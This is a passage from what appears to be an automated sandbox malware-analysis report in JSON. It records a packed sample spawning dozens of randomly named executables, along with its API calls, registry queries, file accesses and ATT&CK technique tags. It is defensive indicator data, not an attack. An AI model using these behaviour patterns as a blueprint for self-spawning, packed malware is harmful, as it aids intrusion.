process \"00802.exe\" (UID: 00000000-00005868)\n Spawned process \"660202.exe\" (UID: 00000000-00005888)\n Spawned process \"trrtd.exe\" (UID: 00000000-00006132)\n Spawned process \"pdrvn.exe\" (UID: 00000000-00005976)\n Spawned process \"xjdpttx.exe\" (UID: 00000000-00004296)\n Spawned process \"208464.exe\" (UID: 00000000-00006080)\n Spawned process \"82064.exe\" (UID: 00000000-00004116)\n Spawned process \"886408.exe\" (UID: 00000000-00006128)\n Spawned process \"42242.exe\" (UID: 00000000-00006040)\n Spawned process \"848482.exe\" (UID: 00000000-00003792)\n Spawned process \"06462.exe\" (UID: 00000000-00002968)\n Spawned process \"2688428.exe\" (UID: 00000000-00003800)\n Spawned process \"0882288.exe\" (UID: 00000000-00005960)\n Spawned process \"642824.exe\" (UID: 00000000-00004012)\n Spawned process \"rjjxrvl.exe\" (UID: 00000000-00004264)\n Spawned process \"pdtrht.exe\" (UID: 00000000-00003576)\n Spawned process \"lvvjfph.exe\" (UID: 00000000-00003784)\n Spawned process \"drlrf.exe\" (UID: 00000000-00001168)\n Spawned process \"xdhfnxr.exe\" (UID: 00000000-00003512)\n Spawned process \"drjtt.exe\" (UID: 00000000-00003636)\n Spawned process \"6886668.exe\" (UID: 00000000-00002868)\n Spawned process \"42042.exe\" (UID: 00000000-00002472)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9\" was detected as \"UPX\" and name: \"Packer\"\n \"ffffffr.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"lvhrb.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"bfltjr.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"htplvld.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"024046.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"4088402.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"046486.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"282482.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"pljnf.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"thdjjv.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"hhbbtl.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"884648.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"82440.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"648086.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"bnbhnh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rjlbldf.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"dndhhn.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"688844.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"464204.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"442444.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"644444.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"26400.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"286488.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"482480.exe\" was detected as \"UPX\" and name: \"Packer\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f4c876@RPCRT4.dll\"\n \"15001600c03e4d6a@ADVAPI32.dll\"\n \"0e000f00703f4d6a@ADVAPI32.dll\"\n \"0e000f00cc3f4d6a@ADVAPI32.dll\"\n \"11001200b4474d6a@ADVAPI32.dll\"\n \"1100120048484d6a@ADVAPI32.dll\"\n \"120013008c484d6a@ADVAPI32.dll\"\n \"12001300e4484d6a@ADVAPI32.dll\"\n \"14001500386e4d6a@ADVAPI32.dll\"\n \"14001500506e4d6a@ADVAPI32.dll\"\n \"14001500686e4d6a@ADVAPI32.dll\"\n \"17001800806e4d6a@ADVAPI32.dll\"\n \"0d000e00986e4d6a@ADVAPI32.dll\"\n \"11001200a86e4d6a@ADVAPI32.dll\"\n \"11001200bc6e4d6a@ADVAPI32.dll\"\n \"0f001000fc6f4d6a@ADVAPI32.dll\"\n \"140015003c704d6a@ADVAPI32.dll\"\n \"1400150054704d6a@ADVAPI32.dll\"\n \"0c000d009c704d6a@ADVAPI32.dll\"\n \"0c000d00ac704d6a@ADVAPI32.dll\"\n \"0e000f00bc704d6a@ADVAPI32.dll\"\n \"0e000f00cc704d6a@ADVAPI32.dll\"\n \"0b000c00dc704d6a@ADVAPI32.dll\"\n \"1800190014734d6a@RPCRT4.dll\"\n \"1300140040734d6a@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"620006.exe\" called \"CreateProcessA\" with parameter \"c:\\lvhxj.exe\" - (UID: 00000000-00005816)\n \"pthnb.exe\" called \"CreateProcessA\" with parameter \"c:\\00802.exe\" - (UID: 00000000-00005896)\n \"06462.exe\" called \"CreateProcessA\" with parameter \"c:\\2688428.exe\" - (UID: 00000000-00002968)\n \"642824.exe\" called \"CreateProcessA\" with parameter \"c:\\rjjxrvl.exe\" - (UID: 00000000-00004012)\n \"64268.exe\" called \"CreateProcessA\" with parameter \"c:\\62440.exe\" - (UID: 00000000-00004048)\n \"64288.exe\" called \"CreateProcessA\" with parameter \"c:\\226448.exe\" - (UID: 00000000-00003280)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9\" has an executable section named \"UPX0\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9\" has an executable section named \"UPX1\"\n \"ffffffr.exe\" has an executable section named \"UPX0\"\n \"ffffffr.exe\" has an executable section named \"UPX1\"\n \"lvhrb.exe\" has an executable section named \"UPX0\"\n \"lvhrb.exe\" has an executable section named \"UPX1\"\n \"bfltjr.exe\" has an executable section named \"UPX0\"\n \"bfltjr.exe\" has an executable section named \"UPX1\"\n \"htplvld.exe\" has an executable section named \"UPX0\"\n \"htplvld.exe\" has an executable section named \"UPX1\"\n \"024046.exe\" has an executable section named \"UPX0\"\n \"024046.exe\" has an executable section named \"UPX1\"\n \"4088402.exe\" has an executable section named \"UPX0\"\n \"4088402.exe\" has an executable section named \"UPX1\"\n \"046486.exe\" has an executable section named \"UPX0\"\n \"046486.exe\" has an executable section named \"UPX1\"\n \"282482.exe\" has an executable section named \"UPX0\"\n \"282482.exe\" has an executable section named \"UPX1\"\n \"pljnf.exe\" has an executable section named \"UPX0\"\n \"pljnf.exe\" has an executable section named \"UPX1\"\n \"thdjjv.exe\" has an executable section named \"UPX0\"\n \"thdjjv.exe\" has an executable section named \"UPX1\"\n \"hhbbtl.exe\" has an executable section named \"UPX0\"\n \"hhbbtl.exe\" has an executable section named \"UPX1\"\n \"884648.exe\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9\" has an writable section named \"UPX0\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9\" has an writable section named \"UPX1\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9\" has an writable section named \"UPX2\"\n \"ffffffr.exe\" has an writable section named \"UPX0\"\n \"ffffffr.exe\" has an writable section named \"UPX1\"\n \"ffffffr.exe\" has an writable section named \"UPX2\"\n \"lvhrb.exe\" has an writable section named \"UPX0\"\n \"lvhrb.exe\" has an writable section named \"UPX1\"\n \"lvhrb.exe\" has an writable section named \"UPX2\"\n \"bfltjr.exe\" has an writable section named \"UPX0\"\n \"bfltjr.exe\" has an writable section named \"UPX1\"\n \"bfltjr.exe\" has an writable section named \"UPX2\"\n \"htplvld.exe\" has an writable section named \"UPX0\"\n \"htplvld.exe\" has an writable section named \"UPX1\"\n \"htplvld.exe\" has an writable section named \"UPX2\"\n \"024046.exe\" has an writable section named \"UPX0\"\n \"024046.exe\" has an writable section named \"UPX1\"\n \"024046.exe\" has an writable section named \"UPX2\"\n \"4088402.exe\" has an writable section named \"UPX0\"\n \"4088402.exe\" has an writable section named \"UPX1\"\n \"4088402.exe\" has an writable section named \"UPX2\"\n \"046486.exe\" has an writable section named \"UPX0\"\n \"046486.exe\" has an writable section named \"UPX1\"\n \"046486.exe\" has an writable section named \"UPX2\"\n \"282482.exe\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"ffffffr.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"lvhrb.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"bfltjr.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"htplvld.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"024046.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"4088402.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"046486.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"282482.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"pljnf.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"thdjjv.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"hhbbtl.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"884648.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"82440.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"648086.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"bnbhnh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rjlbldf.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"dndhhn.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"688844.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"464204.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"442444.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"644444.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"26400.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"286488.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"482480.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"620006.exe\" trying to access non-existent file \"c:\\FLTLIB.DLL\"\n \"620006.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"620006.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"620006.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"620006.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"620006.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" reads file \"c:\\7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" reads file \"c:\\620006.exe\"\n \"620006.exe\" reads file \"c:\\620006.exe\"\n \"620006.exe\" reads file \"c:\\lvhxj.exe\"\n \"lvhxj.exe\" reads file \"c:\\lvhxj.exe\"\n \"lvhxj.exe\" reads file \"c:\\pthnb.exe\"\n \"pthnb.exe\" reads file \"c:\\pthnb.exe\"\n \"pthnb.exe\" reads file \"c:\\00802.exe\"\n \"00802.exe\" reads file \"c:\\00802.exe\"\n \"00802.exe\" reads file \"c:\\660202.exe\"\n \"660202.exe\" reads file \"c:\\660202.exe\"\n \"660202.exe\" reads file \"c:\\trrtd.exe\"\n \"trrtd.exe\" reads file \"c:\\trrtd.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"620006.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"lvhxj.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"pthnb.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"00802.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"660202.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"trrtd.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"pdrvn.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"xjdpttx.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"208464.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"82064.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"886408.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"42242.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"848482.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"06462.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"2688428.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"0882288.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"642824.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rjjxrvl.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"pdtrht.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"lvvjfph.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"drlrf.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"xdhfnxr.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"drjtt.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"6886668.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"7AF444D243E34CEB08F65A090A52C588F9FF4E05241F1F7437305BBF9DECC0C9\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\APPCOMPAT\"; Key: \"DISABLEENGINE\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SHELL FOLDERS\"; Key: \"CACHE\"; Value: \"\")\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\"; Key: \"DISABLELOCALOVERRIDE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" trying to touch file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" trying to touch file \"c:\\620006.exe\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n 